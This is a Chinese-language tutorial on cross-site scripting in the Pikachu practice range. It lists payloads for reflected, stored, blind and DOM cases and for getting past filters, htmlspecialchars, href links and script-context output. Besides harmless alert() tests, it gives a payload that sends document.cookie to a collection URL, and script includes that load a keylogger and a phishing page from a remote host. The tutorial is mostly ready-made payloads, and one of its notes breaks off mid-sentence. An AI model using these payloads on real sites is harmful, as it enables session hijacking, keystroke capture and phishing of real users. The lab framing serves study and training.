一.本文介绍
1、本文介绍xss反射型、存储型、DOM型、盲打、过滤、htmlspecialchars、href输入、js输出。
2、环境准备:pikachu靶场。
二.学习步骤
1、反射型xss
1.1:get:<script>alert("跨站")</script>
在pikachu靶场中将反射型xss(set)文本框的内容长度f12改成200过后输入<script>alert("跨站")</script>,然后点击按钮即可
1.2:post:<script>document.location = '获取cookie的URL?cookie=' + document.cookie;</script>
在pikachu靶场中登录后,在反射型xss(pot)文本框输入<script>document.location = '获取cookie的URL?cookie=' + document.cookie;</script>,然后点击按钮即可。登录靶场后台查看账号,md5密码。
2、存储型:<script>alert("跨站")</script>
在文本框输入:<script>alert(111)</script>,没此点击都会弹出“跨站”窗口
3、盲打:<script>alert("跨站")</script>
在xss盲打文本框中输入:<script>alert("跨站")</script> ,当管理员登录后台( http://IP/pikachu/vul/xss/xssblind/admin_login.php )会弹出提示窗口:
4、xss过滤:<sCrIpT>alert(63252)</sCrIpT>
有的网站有waf,过滤了<script>标签,所以可以用大小写或者其他方式进行绕过。
5、xss之htmlspecialchars: q' onclick='alert(111)'
htmlspecialchars() 函数把预定义的字符转换为 HTML 实体,从而使XSS攻击失效。在文本框输入: q' onclick='alert(111)'
6、xss之href输出:javascript:alert(1111)
在文本框中输入javascript:alert(1111),然后点击下方的链接即可。
7、xss之js输出:</script><script>alert(1111)</script>
在文本框输入:</script><script>alert(1111)</script>即可。
三.注意事项
1、在操作过程中,会遇到各种问题,有可能是环境问题,也有可能是路径问题,pikachu靶场中有的文件路径是需要自己去改的,否则有的会把偶从
2、获取键盘输入内容:<script src="http://IP/pikachu/pkxss/rkeypress/rk.js"></script>
3、钓鱼演示:<script src="http://IP/pikachu/pkxss/xfish/fish.php"></script>
4、get文本框中输入:<script>document.location = 'http://IP/pikachu/pkxss/xcookie/cookie.php?cookie=' + document.cookie;</script>可获取cookie。
网友评论